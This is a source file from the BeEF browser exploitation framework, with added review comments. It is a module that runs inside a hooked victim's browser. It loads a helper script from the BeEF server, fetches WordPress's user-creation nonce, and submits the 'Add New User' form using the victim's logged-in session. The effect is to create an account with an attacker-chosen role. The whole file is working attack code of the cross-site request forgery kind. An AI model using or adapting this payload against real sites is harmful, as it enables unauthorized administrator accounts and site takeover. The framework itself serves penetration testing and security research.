beefproject
GitHub Repository: beefproject/beef
Path: blob/master/modules/misc/wordpress/add_user/command.js
/*
Copyright (c) Browser Exploitation Framework (BeEF) - https://beefproject.com
See the file 'doc/COPYING' for copying permission

This is a complete rewrite of the original module exploits/wordpress_add_admin, which no longer worked.

Original Author: Daniel Reece (@HBRN8).
Rewritten by Erwan LR (@erwan_lr | WPScanTeam) - https://wpscan.org/
*/
beef.execute(function() {
// Globals read by BeEF's helper scripts. Both values are substituted
// server-side by the ERB template before the script reaches the hooked browser,
// so this file is not valid JavaScript until it has been rendered.
beef_command_url = '<%= @command_url %>';
beef_command_id = <%= @command_id %>;

// Adds wp.js to the DOM so we can use some functions here.
// get_nonce, post and log are called below but are not defined in this file;
// presumably they come from wp.js (not shown here). The script is fetched from
// the BeEF server itself (beef.net.host:beef.net.port), so from a defender's
// view it is a second, distinct external-script load on the hooked page.
// The injection is skipped when get_nonce is already defined.
if (typeof get_nonce !== 'function') {
  var wp_script = document.createElement('script');

  wp_script.setAttribute('type', 'text/javascript');
  wp_script.setAttribute('src', beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/wp.js');
  // Prepended to <head> rather than appended; assumes the document has a <head>.
  var theparent = document.getElementsByTagName('head')[0];
  theparent.insertBefore(wp_script, theparent.firstChild);
}

// WordPress's "Add New User" admin form. @wp_path is template-substituted and
// is concatenated as-is, so it is expected to end with a slash.
var create_user_path = '<%= @wp_path %>wp-admin/user-new.php';

/*
When there is an error (such as an incorrect email, a username that already exists, etc.),
the response is a 200 with an ERROR marker in the body.

When the user is successfully created, WordPress answers with a 302; the browser follows
the redirection transparently, so the AJAX callback only ever sees the final 200 and never
the 302. The 'New user created.' pattern in the page is therefore checked instead.

Defender's note: both the nonce lookup and the form submission are issued by the hooked
browser against the WordPress origin, so they ride on whatever session that browser already
holds for the site. Presumably the submission only succeeds when that session is allowed to
create users, which is consistent with the original module's name (wordpress_add_admin).
*/
/*
Inspects the XHR handed back by post() and reports the outcome through log().
Only a 200 is examined (see the comment above: the 302 on success is followed
by the browser, so the callback never sees it).

NOTE(review): responseText and matches are assigned without var, so they become
properties of the global object of the hooked page. Harmless for the module
itself, but sloppy, and easy to spot when auditing a page's globals.
*/
function check_response_for_error(xhr) {
  if (xhr.status == 200) {
    responseText = xhr.responseText;

    // The regex expects the form error markup "<strong>ERROR</strong>: <message></p>";
    // the captured message is forwarded to log().
    if ((matches = /<strong>ERROR<\/strong>: (.*?)<\/p>/.exec(responseText))) {
      log('User Creation failed: ' + matches[1], 'error');
    }
    // Success notice rendered by user-new.php after the redirect.
    else if (/New user created/.test(responseText)) {
      log('User successfully created!', 'success');
    }
    // A 200 body matching neither pattern is silently ignored.
  }
  // Non-200 statuses are silently ignored as well; nothing is logged.
}
/*
Submits the "Add New User" form with a freshly obtained nonce.
All user-facing values (username, email, password, role) are substituted into
this script server-side by the ERB template; the password is sent twice because
the form has a confirmation field.

post() is not defined in this file (presumably wp.js); how it encodes the fields
and whether it attaches cookies is not visible here.
*/
function create_user(nonce) {
  post(
    create_user_path,
    {
      action: 'createuser',
      // Anti-CSRF nonce field of the form; presumably the submission is rejected
      // without a valid one, which is why get_nonce() runs first.
      '_wpnonce_create-user': nonce,
      '_wp_http_referer': create_user_path,
      user_login: '<%= @username %>',
      email: '<%= @email %>',
      first_name: '',
      last_name: '',
      url: '',
      pass1: '<%= @password %>',
      pass2: '<%= @password %>',
      // Form checkbox confirming use of a weak password.
      pw_weak: 'on', // Just in case
      role: '<%= @role %>',
      // Submit-button value. NOTE(review): the '+' characters look like a
      // pre-URL-encoded label; whether post() encodes them again depends on wp.js.
      createuser: 'Add+New+User'
    },
    function(xhr) { check_response_for_error(xhr) }
  );
}
// Timeout needed for the wp.js to be loaded first.
// NOTE(review): this is a fixed 300 ms delay rather than waiting for the
// injected script's load event, so on a slow path get_nonce may still be
// undefined when the timer fires and the call below throws a ReferenceError.
setTimeout(
  function() {
    // get_nonce (from wp.js, not shown) presumably fetches the form page and
    // hands the '_wpnonce_create-user' value to the callback.
    get_nonce(
      create_user_path,
      '_wpnonce_create-user',
      function(nonce) { create_user(nonce) }
    )
  },
  300
);

});